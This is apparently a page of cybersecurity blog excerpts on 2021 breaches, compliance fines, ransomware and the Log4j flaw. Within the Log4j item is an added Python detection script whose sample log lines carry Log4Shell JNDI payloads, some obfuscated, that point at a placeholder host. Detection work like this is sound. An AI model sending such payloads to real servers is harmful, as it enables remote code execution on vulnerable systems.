SHARED INTEL: Data breaches across the globe slowed significantly in Q4 2021 versus Q1-Q3

By Vytautas Kaziukonis

After a gloomy start, with three breach-intensive quarters in a row, 2021 has finally ended on a positive note.

Related: Cybersecurity experts reflect on 2021

This conclusion is derived from an analysis of data taken from our data breach detection tool, Surfshark Alert, which comprises publicly available breached data sets to inform our users of potential threats.

Our analysis looked into data breaches that occurred from October to December 2021 (Q4) and compared them with the numbers from July through September 2021 (Q3). Breached accounts were analyzed by country of origin and by the time the breach was recorded.

All information either stolen or taken from a system without the authorization of the platform’s owner (in other words, proactively hacked or scraped) is considered a data breach. The association of a given data set with a specific breach instance is inferred rather than confirmed. Full study data is available here.

GUEST ESSAY: JPMorgan’s $200 million in fines stems from all-too-common compliance failures

By Dima Gutzeit

Last month’s $125 million Securities and Exchange Commission (SEC) fine, combined with the $75 million U.S. Commodity Futures Trading Commission (CFTC) fine against JPMorgan, sent shockwaves through financial and other regulated customer-facing industries.

Related: Why third-party risks are on the rise

According to an SEC release, the hefty fines brought against JPMorgan and its subsidiaries were based on “widespread and longstanding failures by the firm and its employees to maintain and preserve written communications”. These views were echoed in a CFTC release as well.

While the price tag of these violations was shocking, the compliance failure was not. The ever-changing landscape of rapid communication via instant messaging apps, such as WhatsApp, Signal, WeChat, Telegram, and others, has left regulated industries to find a balance between compliance and efficient client communication.

Insecure platforms

Approved forms of communication such as phone calls, emails, and fax are viewed by some consumers as obsolete. So, as teams work to remain relevant, team leaders and employees carry the burden of ensuring a better and more intuitive customer experience.

Many of these instant messaging platforms are secure, even offering end-to-end encryption, so the lack of security is not necessarily in the apps themselves. Without a responsible business communication platform for these conversations to flow through, customer requests and discussions live only on employees’ personal devices.

MY TAKE: What if Big Data and AI could be intensively focused on health and wellbeing?

By Byron V. Acohido

Might it be possible to direct cool digital services at holistically improving the wellbeing of each citizen of planet Earth?

Related: Pursuing a biological digital twin

A movement aspiring to do just that is underway — and it’s not being led by a covey of tech-savvy Tibetan monks. This push is coming from the corporate sector.

Last August, NTT, the Tokyo-based technology giant, unveiled its Health and Wellbeing initiative – an ambitious effort to guide corporate, political and community leaders onto a more enlightened path. NTT, in short, has set out to usher in a new era of human wellness.

Towards this end it has begun sharing videos, whitepapers and reports designed to rally decision makers from all quarters to a common cause. The blue-sky mission is to bring modern data mining and machine learning technologies to bear delivering personalized services that ameliorate not just physical ailments, but also mental and even emotional ones.

That’s a sizable fish to fry. I had a lively discussion with Craig Hinkley, CEO of NTT Application Security, about the thinking behind this crusade. I came away encouraged that some smart folks are striving to pull us in a well-considered direction. For a full drill down, please give the accompanying podcast a listen. Here are a few key takeaways:

A new starting point

Modern medicine has advanced leaps and bounds in my lifetime when it comes to diagnosing and treating severe illnesses. Even so, for a variety of reasons, healthcare sectors in the U.S. and other jurisdictions have abjectly failed over the past 20 years to leverage Big Data to innovate personalized healthcare services.

ROUNDTABLE: What happened in privacy and cybersecurity in 2021 — and what’s coming in 2022

By Byron V. Acohido

In 2021, we endured the fallout of a seemingly endless parade of privacy controversies and milestone cyber attacks.

Related: The dire need to security-proof APIs

The SolarWinds hack demonstrated supply chain exposures; the attempted poisoning of a Tampa suburb’s water supply highlighted public utilities at risk; and the Colonial Pipeline ransomware attack signaled that cyber extortionist rings continue to run rampant.

On the privacy front, California beefed up its consumer data privacy regulations even as Facebook and Apple publicly feuded over how each of these tech giants abuses consumer privacy and loosely handles sensitive data.

Meanwhile, President Biden issued a cybersecurity executive order finally putting the federal government’s regulatory stamp on foundational cyber hygiene practices many organizations should have already been doing, yet continue to give short shrift.

Last Watchdog sought commentary from technology thought leaders about lessons learned in 2021, and any guidance they might have to offer heading into 2022.

GUEST ESSAY: Why the arrests of cyber criminals in 2021 will incentivize attackers in 2022

By Wade Lance

In 2021, law enforcement continued making a tremendous effort to track down, capture and arrest ransomware operators, to take down ransomware infrastructure, and to claw back ransomware payments.

Related: The targeting of supply chains

While some of these efforts have been successful, and may prevent more damage from being done, it is important to realize that headline news is a lightning rod for more attacks. Successful attacks breed copycats, and their arrests make room for replacements. Malicious actors are opportunistic.

Of course they don’t want to get busted and they don’t want authorities taking down their infrastructure, but these arrests are an incentive to get into the ransomware market and a learning experience on how to adapt their tactics.

I expect a new wave of ransomware operators that use cryptocurrency to avoid tracking, remotely-located operations to avoid extradition and arrest, and the hardening of operational security to avoid infrastructure take down.

SHARED INTEL: Log4j vulnerability presents a gaping attack vector companies must heed in 2022

By Byron V. Acohido

As we close out 2021, a gargantuan open-source vulnerability has reared its ugly head.

Related: The case for ‘SBOM’

This flaw in the Apache Log4j logging library is already being aggressively probed and exploited by threat actors, and it is sure to become a major headache for security teams in 2022.

“This vulnerability is so dangerous because of its massive scale. Java is used on over 3 billion devices, and a large number of those use Log4j,” says Forrester cybersecurity analyst Allie Mellen, adding that crypto miners and botnet operators are already making hay.

“We can expect more devastating attacks, like ransomware, leveraging this vulnerability in the future,” Mellen adds. “This vulnerability will be used for months if not years to attack enterprises, which is why security teams must strike while the iron is hot.”

This Log4j vulnerability was disclosed to Apache on Nov. 24 by the Alibaba Cloud Security team. Then on Dec. 9, the vulnerability, formally designated CVE-2021-44228, was disclosed on Twitter; meanwhile a proof-of-concept exploit got posted on GitHub.

This flaw in an open-source logging library used far and wide, embedded in countless web applications and servers, puts open-source risks in the spotlight yet again. Companies will have to deal with Log4j in much the same manner as they were compelled to react to the open source flaws Heartbleed and Shellshock in 2014.
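The column describes CVE-2021-44228 as being aggressively probed in the wild. As an added example, not code from the original column or from the Log4j project, here is a small Python triage script that finds Log4Shell probe strings in web-server access logs. It normalizes the three obfuscations attackers used most in the first days (URL encoding, `${lower:...}`/`${upper:...}` wrappers and the `${...:-x}` default-value trick) before matching the `${jndi:<scheme>:` pattern. The log lines are constructed for this example and use documentation-range IP addresses, not real attacker infrastructure.

```python
import re
import urllib.parse
from typing import List, Tuple

# Constructed sample access-log lines (not real traffic). Lines 2-5 carry the
# probe shapes commonly seen after Dec. 9, 2021; lines 1 and 6 are benign.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:10:01:22 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:02:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:02:04 +0000] "GET /?x=${${lower:j}ndi:${lower:r}mi://203.0.113.7/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:10:02:05 +0000] "GET /login HTTP/1.1" 200 10 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.7/c}"',
    '10.0.0.9 - - [10/Dec/2021:10:02:06 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.7%2Fd%7D HTTP/1.1" 200 10 "-" "python-requests"',
    '10.0.0.3 - - [10/Dec/2021:10:03:00 +0000] "GET /docs/${version} HTTP/1.1" 200 33 "-" "Mozilla/5.0"',
]

# ${lower:x} / ${upper:x}: Log4j case lookups used to hide the letters of "jndi".
_LOOKUP_CASE = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^{}$]*)\}", re.IGNORECASE)
# ${name:-default}: Log4j default-value syntax; ${::-j} evaluates to "j".
# The name part is matched lazily so the innermost lookup is rewritten first.
_LOOKUP_DEFAULT = re.compile(r"\$\{([^{}]*?):-([^{}]*)\}")
# The payload shape after de-obfuscation: ${jndi:ldap:...}, ${jndi:rmi:...}, ...
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 8) -> str:
    """Undo URL encoding and Log4j lookup obfuscation until the text stops changing.

    The round limit bounds work on adversarial input (deeply nested lookups).
    """
    prev = None
    for _ in range(max_rounds):
        if text == prev:
            break
        prev = text
        text = urllib.parse.unquote(text)
        text = _LOOKUP_CASE.sub(lambda m: m.group(1).lower(), text)
        text = _LOOKUP_DEFAULT.sub(lambda m: m.group(2), text)
    return text


def find_jndi_lookups(line: str) -> List[str]:
    """Return the JNDI schemes (ldap, rmi, dns, ...) found in one log line."""
    return [m.group(1).lower() for m in _JNDI.finditer(normalize(line))]


def scan_log_lines(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """Return (1-based line number, schemes) for every line that carries a probe."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        schemes = find_jndi_lookups(line)
        if schemes:
            hits.append((lineno, schemes))
    return hits


if __name__ == "__main__":
    for lineno, schemes in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {lineno}: jndi lookup via {', '.join(schemes)}")
```

Run it over real access logs with `scan_log_lines(open(path).read().splitlines())`. Two caveats a practitioner should keep in mind: this only sees what the web server logged (a payload placed in a header the server does not log will not appear), and a hit tells you someone probed, not that the application was vulnerable; the fix is still to upgrade the library, and this script is only for triaging who knocked and over which JNDI scheme.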

ROUNDTABLE: Cybersecurity experts reflect on 2021, foresee intensifying challenges in 2022

By Byron V. Acohido

Privacy and cybersecurity challenges and controversies reverberated through all aspects of business, government and culture in the year coming to a close.

Related: Thumbs up for Biden’s cybersecurity exec order

Last Watchdog sought commentary from technology thought leaders about lessons learned in 2021, and guidance heading into 2022. More than two dozen experts participated. Here is the first of two articles highlighting what they had to say. Comments edited for clarity and length. The second roundtable column will be published on Dec. 27th.

Paul Ayers, CEO, Noetic Cyber

In 2021, large supply chain attacks successfully exploited critical vulnerabilities. Patching is hard and prioritization is key. By mapping cyber relationships to business context, security teams can focus on a smaller number of critical assets and vulnerabilities.

The cyber industry swings back and forth between prevention and response. A renewed focus on preventative approaches, like security posture management, cyber hygiene and cyber asset management, shows organizations are trying to anticipate these problems. Forward-thinking security teams are working to unlock siloed telemetry and generate a wider cybersecurity view of the organization.

Dr. Darren Williams, CEO, BlackFog

We’re seeing ransomware gangs morph into savvy businesses, with one going so far as to create a fake company to recruit talent. In 2022, we’ll see this trend continue to pick up steam, with greater coordination between gangs, double extortion evolving to triple extortion, and short selling schemes skyrocketing.

Additionally, we will see a shift in threat actors coming from Southeast Asia and Africa. As cyber criminals look to find cheaper labor and technical expertise, we’ll see activity pick up in these regions in 2022 and beyond.